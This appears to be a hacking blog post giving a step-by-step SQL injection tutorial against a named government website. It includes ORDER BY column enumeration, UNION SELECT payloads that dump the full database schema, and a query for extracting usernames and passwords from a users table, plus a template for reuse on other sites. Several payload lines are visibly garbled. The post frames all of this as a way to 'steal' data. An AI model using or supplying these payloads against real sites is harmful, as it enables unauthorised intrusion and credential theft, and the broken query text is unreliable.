Evil Twin Injection






Asalamu alaikum all Noob-Friends:

Today I am going to share with you Evil Twin Injection Tutorial
Ok Lets Start:

First IF you know about manual Sql Injection thats good
Now find a Vulnerable site eg:
http://www.beza.gov.bd/page.php?id=47

Open This Link And Add A Single
Quote (')
The Web Page Will Give Syntax Error
OkayNow We Need To Find
Vulnerable Numbers Of Columns (Y)
Like This

http://www.beza.gov.bd/page.php?
id=47'+order+by+1--+ No Error

http://www.beza.gov.bd/page.php?
id=47'+order+by+2--+ No Error

http://www.beza.gov.bd/page.php?
id=47'+order+by+3--+

http://www.beza.gov.bd/page.php?
id=47'+order+by+16--+ No Error

http://www.beza.gov.bd/page.php?
id=47'+order+by+17--+ No Error

http://www.beza.gov.bd/page.php?
id=47'+order+by+18--+ Error

The Website Has 17 Columns
Now We Will Find Vulnerable
Columns

Okay Keep Moving Forward
http://www.beza.gov.bd/page.php?
id=-47'+union+select
+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,
+
Now The Numbers On The Page Is
Injectable ( 4,6 ) We Will Inject
Number ( 4 )

Okay, Our First Query Is:-
(select (@) from (select(@:=0x00),
(select (@) from
(information_schema.columns)
where (table_schema>=@) and (@)in
(@:=concat
(@,0x3C,0x62,0x72,0x3E,' [ ',table_sch
> ',table_name,' >
',column_name))))a)

Copy And Paste This In Vulnerable
Column (Y) Like This

http://www.beza.gov.bd/page.php?
id=-47'+union+select+1,2,3,(select
(@) from (select(@:=0x00),(select
(@) from
(information_schema.columns)
where (table_schema>=@) and (@)in
(@:=concat
(@,0x3C,0x62,0x72,0x3E,' [ ',table_sch
> ',table_name,' >
',column_name))))a),5,6,7,8,9,10,11,12,
+

BINGO! After Using This
Query Page Will Show Whole
Database (Y) Now We Will Find
Tables And Columns (users, user,
admin, user_login, adm, login_detail,
login, admin_login ETC ETC)
In This Website We Will Steal Table
(users) Data :
okay Now We Will use This Query

(select (@) from (select(@:=0x00),
(select (@) from (users) where (@)in
(@:=concat
(@,0x3C,0x62,0x72,0x3E,' [ ',usernam
> ',password,' > '))))a)

Remove Old Query And Paste This In
Column Number 4
like This

http://www.beza.gov.bd/page.php?
id=-47'+union+select+1,2,3,(select
(@) from (select(@:=0x00),(select
(@) from (users) where (@)in
(@:=concat
(@,0x3C,0x62,0x72,0x3E,' [ ',usernam
> ',password,' >
'))))a),5,6,7,8,9,10,11,12,13,14,15,16,17
+

And Last Thing I Want To Tell You Is,
As Uh All Know That Every Website
Has Different Names Of Columns And
Database So Uh Have To Change
The Query Like This

(select (@) from (select(@:=0x00),
(select (@) from
(TABLE_NAME_HERE) where (@)in
(@:=concat
(@,0x3C,0x62,0x72,0x3E,' [ ',USER_CO
> ',PASSWORD_COLUMN_HERE,' >
'))))a)

OK keep EnJoying With Evil Twin Injection if your ass suffer
From long Manual Sql Injection ☺

GreetZ: Thank you to Kashmiri Cheeta
 Tutorial by Mãlik Ußaid

Newer Post
Post A Comment
  • Blogger Comment using Blogger
  • Facebook Comment using Facebook
  • Disqus Comment using Disqus

No comments :


Subscribe to: Post Comments (Atom)